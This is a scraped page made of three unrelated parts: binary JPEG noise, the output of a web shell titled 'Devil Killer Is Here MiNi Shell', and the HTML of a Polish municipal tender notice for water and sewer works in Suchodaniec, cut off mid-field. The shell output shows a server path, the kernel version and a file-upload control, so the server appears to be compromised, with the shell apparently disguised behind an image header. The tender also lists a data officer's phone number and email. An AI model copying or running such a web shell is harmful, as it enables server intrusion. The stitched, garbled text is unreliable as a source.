JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230119/0004347501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa i przebudowa sieci wodociągowej oraz budowa sieci kanalizacji sanitarnej w miejscowości Suchodaniec </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA IZBICKO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531413219</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Powstańców Śląskich 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Izbicko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-180</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774617221</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@izbicko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.izbicko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa i przebudowa sieci wodociągowej oraz budowa sieci kanalizacji sanitarnej w miejscowości Suchodaniec </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-937687b4-972b-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00043475</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00034591/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Rozbudowa i przebudowa sieci wodociągowej oraz budowa sieci kanalizacji sanitarnej w miejscowości Suchodaniec</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-937687b4-972b-11ed-b4ea-f64d350121d2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu:<br/>1) portalu: e-zamowienia.gov.pl<br/>2) ePUAPu https://epuap.gov.pl<br/>3) poczty elektronicznej: przetargi@izbicko.pl<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na platformie ezamowienia.gov.pl. Wykonawca posiadający konto na platformie ezamowienia.gov.pl ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz formularza do komunikacji.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu, opisane zostały w Regulaminie korzystania z serwisu dostępnym pod adresem:<br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu.<br/>5. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z platformy ezamowienia.gov.pl, określone w Regulaminie korzystania z Platformy e-Zamówienia oraz zobowiązuje się korzystając z Platformy e-Zamówienia przestrzegać postanowień tego regulaminu.<br/>6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na Platformie e-Zamówienia.<br/>7. Dane postępowania można wyszukać na liście wszystkich postępowań klikając opcję „Biuletyn Zamówień Publicznych”- postępowania<br/>8. W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania.<br/>9. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej<br/>https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>Informacje o sposobie komunikowania się Zamawiającego z Wykonawcami w inny<br/>sposób niż przy użyciu środków komunikacji elektronicznej w przypadku zaistnienia<br/>jednej z sytuacji określonych w art. 65 ust. 1, art. 66 i art. 69 pzp:<br/>Zamawiający nie przewiduje komunikowania się z Wykonawcami w inny sposób, niż przy użyciu środków komunikacji elektronicznej.<br/><br/>Zgodnie z art. 61. ust. 1. oraz art. 63 ust. 2 ustawy Pzp z dnia 11 września 2019 r. komunikacja w niniejszym postępowaniu odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej, pliki należy opatrzyć:<br/>- kwalifikowanym podpisem elektronicznym,<br/>- podpisem zaufanym,<br/>- lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">5. Postanowienia dotyczące przetwarzania danych osobowych:<br/>1)	Zamawiający informuję, że dane osobowe pozyskane w związku z przeprowadzeniem niniejszego postępowania przetwarzane będą na podstawie art. 6 ust. 1 lit. c Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej &#34;Rozporządzenie RODO&#34; w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/>2)	Administratorem danych osobowych jest Zamawiający. Podstawą prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych, wydane na jej podstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym i archiwach. Inspektorem ochrony danych osobowych jest Sławomir Biliński tel.668620696, adres e-mail: bil102@onet.pl<br/>3)	Dane osobowe będą przetwarzane, z uwzględnieniem przepisów prawa, w celu:<br/>a)	przeprowadzenie postępowania o udzielenie zamówienia publicznego,<br/>b)	zawarcia i realizacji umowy z wyłonionym w niniejszym postępowaniu wykonawcą,<br/>c)	dokonania rozliczenia i płatności związanych z realizacją umowy,<br/>d)	przeprowadzenie ewentualnych postępowań kontrolnych i / lub audytu przez komórki Zamawiającego i inne uprawnione podmioty,<br/>e)	udostępnienie dokumentacji postępowania i zawartej umowy jako informacji publicznej,<br/>f)	archiwizacji postępowania.<br/>4)	Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym.<br/>5)	Dane osobowe będą przechowywane przez okres obowiązywania umowy a następnie przez okres co najmniej 5 lat zgodnie z przepisami dotyczącymi archiwizacji. Dotyczy to wszystkich uczestników postępowania.<br/>6)	Osobie, której dane dotyczą przysługuje na warunkach określonych w przepisach Rozporządzenia RODO:<br/>a)	prawo dostępu do danych (art. 15),<br/>b)	prawo sprostowania danych (art. 16),<br/>c)	prawo do usunięcia danych (art. 17),<br/>d)	prawo do ograniczenia przetwarzania danych (art. 18).<br/>e)	prawo wniesienia skargi do organu nadzorczego.<br/>7)	Osobie, której dane dotyczą nie przysługuje:<br/>a)	prawo do usunięcia danych osobowych, &#34;prawo do bycia zapomnianym&#34; w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia RODO,<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia RODO,<br/>c)	prawo sprzeciwu, o którym mowa w art. 21 Rozporządzenia RODO,<br/>8)	Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu dokonanie oceny spełniania warunków udziału w postępowaniu oraz zdolności wykonawcy do należytego wykonania zamówienia, co skutkować może wykluczeniem wykonawcy z postępowania lub odrzuceniem jego oferty.<br/>9)	Wystąpienie z żądaniem o którym mowa w pkt. 6 lub 7, nie ogranicza przetwarzania danych osobowych do czasu zakończenia niniejszego postępowania. Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania lub umowy.<br/>10)	Wykonawca pozyskując dane osobowe na potrzeby sporządzenia oferty zobowiązany jest wypełnić obowiązki wynikające m. in. z art 13 i 14 Rozporządzenia RODO. Wykonawca składając ofertę składa oświadczenie dotyczące przetwarzania danych osobowych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W przypadku gdy wykonawca nie przekazuje danych osobowych innych niż bezpośrednio jego dotyczących lub zachodzi wyłączenie stosowania obowiązku informacyjnego, stosownie do art. 13 ust. 4 lub art. 14 ust. 5 RODO treści oświadczenia wykonawca nie składa (usunięcie treści oświadczenia np. przez jego wykreślenie).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1441349042 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: Rozbudowa i przebudowa sieci wodociągowej oraz budowa sieci kanalizacji sanitarnej w miejscowości Suchodaniec.<br/><br/>Zakres inwestycji dotyczy rozbudowy i przebudowy sieci wodociągowej wraz z wymianą przyłączy do budynków oraz budowy sieci kanalizacji sanitarnej grawitacyjnej i ciśnieniowej wraz z kanałami bocznymi i przepompowniami w miejscowości Suchodaniec z uwzględnieniem wymaganej rozbudowy sieci kanalizacji sanitarnej w rejonie ulicy 1 Maja w miejscowości Ligota Czamborowa.<br/>Inwestorem jest Gmina Izbicko z siedzibą w Izbicku przy ul. Powstańców Śląskich 12, 47-180 Izbicko.<br/>1.	Charakterystyka zakresu inwestycji obejmującego sieć wodociągową:<br/>Przedsięwzięcie polega na budowie nowej sieci wodociągowej rozdzielczej wraz z hydrantami oraz z przełączeniem do niej przewidzianych do wymiany przyłączy wodociągowych do posesji położonych w miejscowości Suchodaniec. Inwestycja jest spowodowana złym stanem technicznym istniejącej sieci z rur azbestowo-cementowych i stalowych co wymaga przebudowy systemu sieci wodociągowej.<br/>W ramach projektowanego przedsięwzięcia w celu poprawy jakości wody dostarczanej do zabudowań w miejscowości Suchodaniec projektuje się przebudowę istniejącej sieci wodociągowej rozdzielczej poprzez jej odłączenie (rurociągi wyłączone z eksploatacji zostaną zdemontowane lub pozostaną w ziemi) i wykonanie nowych rurociągów wodociągowych wraz z hydrantami nadziemnymi i podłączeniem do nowej sieci wszystkich istniejących przyłączy wodociągowych.<br/>Na obszarze objętym przedsięwzięciem sieć wodociągowa rozdzielcza prowadzona będzie głównie w obszarze istniejących układów komunikacyjnych w celu zapewnienia dostawy wody do wszystkich istniejących budynków oraz do działek przewidywanych do zabudowy na przedmiotowym obszarze zgodnie z aktualnie obowiązującym miejscowym planem zagospodarowania przestrzennego.<br/>W ramach przedsięwzięcia w okresie realizacji należy zapewnić stałe zaopatrzenie w wodę posesji, a przerwy w dostawie związane powinny być jedynie z podłączeniem nowych odcinków rurociągów. Odcinki istniejącej sieci odkryte w trakcie wykonywania wykopów wraz z armaturą (hydranty, zasuwy itp.) należy zdemontować, a wytworzone odpady zagospodarować zgodnie z obowiązującymi przepisami. Zakłada się pozostawienie w ziemi części istniejących rur sieci wodociągowej na odcinkach gdzie wykop nie przebiega w jej zasięgu, takie odcinki po odcięciu dopływu wody należy z obu stron zaślepić.<br/>Planuje się podłączenie projektowanego rurociągu wodociągowego do istniejącej sieci wodociągowej z rur PE o średnicy zewnętrznej 110mm w rejonie skrzyżowania ul. Ligonia z ul. Reymonta oraz do istniejącej sieci wodociągowej z rur PVC o średnicy 110mm w rejonie miejscowości Otmice. <br/>Rurociąg wodociągowy rozdzielczy sieciowy zostanie wykonany z rur ciśnieniowych do wody PE100 SDR17 PN10 o średnicy Ø110x6,6mm (DN100). Przewiduje się również wykonanie nowych hydrantów nadziemnych DN80, które zostaną zlokalizowane w miejscach wskazanych na projekcie. Hydranty zostaną połączone z projektowaną siecią wodociągową za pomocą kształtek żeliwnych oraz krótkich odcinków z rur PE100 SDR17 PN10 o średnicy Ø90x5,4mm (DN80). Ze względu na brak możliwości lokalizacji hydrantu nadziemnego na końcu odcinka sieci wodociągowej w ul. Kochanowskiego zaprojektowano jeden hydrant podziemny oznaczony Hp17.<br/><br/>Zakres rzeczowy rozbudowy i przebudowy sieci wodociągowej wraz z wymianą przyłączy obejmuje wykonanie:<br/>-	rurociąg sieciowy rozdzielczy z rur ciśnieniowych do wody <br/>PE100 SDR17 PN10 o średnicy Ø110x6,6mm (DN100)	- 6924,0 m<br/>-	rurociąg sieciowy rozdzielczy z rur ciśnieniowych do wody <br/>PE100 SDR17 PN10 o średnicy Ø90x5,4mm (DN80)	- 100,5 m<br/>-	hydrant nadziemny DN80 z zasuwą odcinającą	- 43 kpl.<br/>-	hydrant podziemny DN80 z zasuwą odcinającą	- 1 kpl.<br/>-	kompletne węzły wodociągowe z kształtkami, złączkami i zasuwami <br/>klinowymi kołnierzowymi DN100 typu E z obudową i skrzynką uliczną - 16 kpl.<br/>-	obejma do nawiercana do rur Dz110mm z odejściem <br/>kołnierzowym DN80mm wraz z zasuwą, obudową i skrzynką uliczną	- 2 kpl.<br/>-	rurociąg przyłączy z rur PE100 SDR17 PN10 o średnicy Ø90x5,4mm	- 18,0 m<br/>-	studzienka wodomierzowa DN1000 wraz z wyposażeniem wewnętrznym	- 2 kpl.<br/>-	nawiertka do rur Dz110mm z odejściem dla rur Dz32mm <br/>wraz z zasuwą, obudową i skrzynką uliczną	- 152 kpl.<br/>-	rurociąg przyłączy z rur PE100 SDR17 PN10 o średnicy Ø32x2,0mm	- 2787,0 m<br/>-	studzienka wodomierzowa DN500 wraz z wyposażeniem wewnętrznym	- 10 kpl.<br/>-	zestaw wodomierzowy wraz z zaworami i złączkami <br/>do zabudowy wewnątrz budynku	- 94 kpl.<br/><br/>2.	Charakterystyka zakresu inwestycji obejmującego sieć kanalizacyjną sanitarną:<br/>W ramach niniejszego przedsięwzięcia przewiduje się wykonanie kanalizacji sanitarnej grawitacyjno-ciśnieniowej w miejscowości Suchodaniec w celu zebrania ścieków bytowych pochodzących z obszarów zabudowanych na tym terenie i ich odprowadzenie dalej do systemu kanalizacji sanitarnej w miejscowości Ligota Czamborowa, z uwzględnieniem wymaganej rozbudowy sieci kanalizacji sanitarnej w rejonie ulicy 1 Maja w miejscowości Ligota Czamborowa. Włączenie projektowanej kanalizacji do systemu kanalizacyjnego w miejscowości Ligota Czamborowa planowane jest do istniejącej sieci kanalizacyjnej ks200 w ulicy 1 Maja.<br/>Trasę projektowanej kanalizacji sanitarnej grawitacyjnej oraz rurociągów tłocznych ze względu na istniejące uwarunkowania terenowe przewidziano w pasie dróg gminnych: ulicy Ligonia, Reymonta, Mickiewicza, Konopnickiej, Kochanowskiego, Wyzwolenia oraz dróg powiatowych: ulicy Dębowej i Kadetów Lwowskich, a także dróg wewnętrznych. W ramach przedsięwzięcia przewidywane jest również wykonanie metodą bezwykopową przejścia pod jezdnią drogi krajowej nr 94 (w miejscu skrzyżowania z ulicą Kadetów Lwowskich) oraz pod korytem rzeki Sucha (w miejscu skrzyżowania z ulicą Mickiewicza). Częściowo projektowaną kanalizację usytuowano w pasach drogowych dróg wewnętrznych, a także w obszarze działek prywatnych (kanały boczne do podłączenia posesji).<br/>Lokalizacja projektowanych przepompowni ścieków planowana jest w na terenie działek gminnych tj. przepompownia PS-2 na działce nr 330/2 w ciągu ul. Ligonia i przepompownia PS-3 na działce nr 289 w ciągu ulicy Mickiewicza) oraz na terenie działek prywatnych tj. przepompownia PS-1 na działce nr 329 przy ul. Reymonta i przepompownia PS-4 na działce nr 701/28. Ich usytuowanie w sąsiedztwie układów komunikacyjnych zapewnia bezproblemowy dojazd w celach eksploatacyjnych i porządkowych.<br/><br/>Zakres rzeczowy budowy sieci kanalizacyjnej sanitarnej obejmuje wykonanie:<br/>-	kanały grawitacyjne sieciowe z rur Dz200mm PVC-U SN12 SDR34	- 5699,0m<br/>-	kanały boczne grawitacyjne z rur Dz160mm PVC-U SN12 SDR34	- 936,0m<br/>-	studzienka sieciowa rewizyjna Ø1000mm betonowa - 218 szt.<br/>-	studzienka przyłączeniowa Ø425mm z tworzywa sztucznego - 149 szt.<br/>-	sieciowa przepompownia ścieków PS-1 z wyposażeniem wewnętrznym, <br/>sterowaniem i zagospodarowaniem terenu oraz zasilaniem energetycznym - 1 kpl.<br/>-	sieciowa przepompownia ścieków PS-2 z wyposażeniem wewnętrznym, <br/>sterowaniem i zagospodarowaniem terenu oraz zasilaniem energetycznym - 1 kpl.<br/>-	sieciowa przepompownia ścieków PS-3 z wyposażeniem wewnętrznym, <br/>sterowaniem i zagospodarowaniem terenu oraz zasilaniem energetycznym - 1 kpl.<br/>-	sieciowa przepompownia ścieków PS-4 z wyposażeniem wewnętrznym, <br/>sterowaniem i zagospodarowaniem terenu oraz zasilaniem energetycznym - 1 kpl.<br/>-	przydomowa przepompownia ścieków wraz z wewnętrznym <br/>(zalicznikowym) zasilaniem energetycznym - 2 kpl.<br/>-	rurociąg tłoczny sieciowy z rur PE 100 SDR 17 PN10 <br/>o średnicy 110x6,6mm - 2131,0m<br/>-	rurociąg tłoczny sieciowy z rur PE 100 SDR 17 PN10 <br/>o średnicy 90x5,4mm - 901,5 m<br/>-	rurociąg tłoczny sieciowy z rur PE100 SDR17 PN10 <br/>o średnicy 63x3,8mm - 224,0 m<br/>-	rurociąg tłoczny boczny z rur PE100 SDR17 PN10 <br/>o średnicy 63x3,8mm - 72,0 m<br/>-	systemowa studzienka rozprężna Ø1000mm z tworzyw sztucznych - 6 kpl.<br/>-	studzienka rewizyjna Ø1200mm betonowa na rurociągu tłocznym - 10 kpl.<br/><br/>Szczegółowy opis zamówienia zawiera załącznik nr 10 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">kryterium wyboru</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: 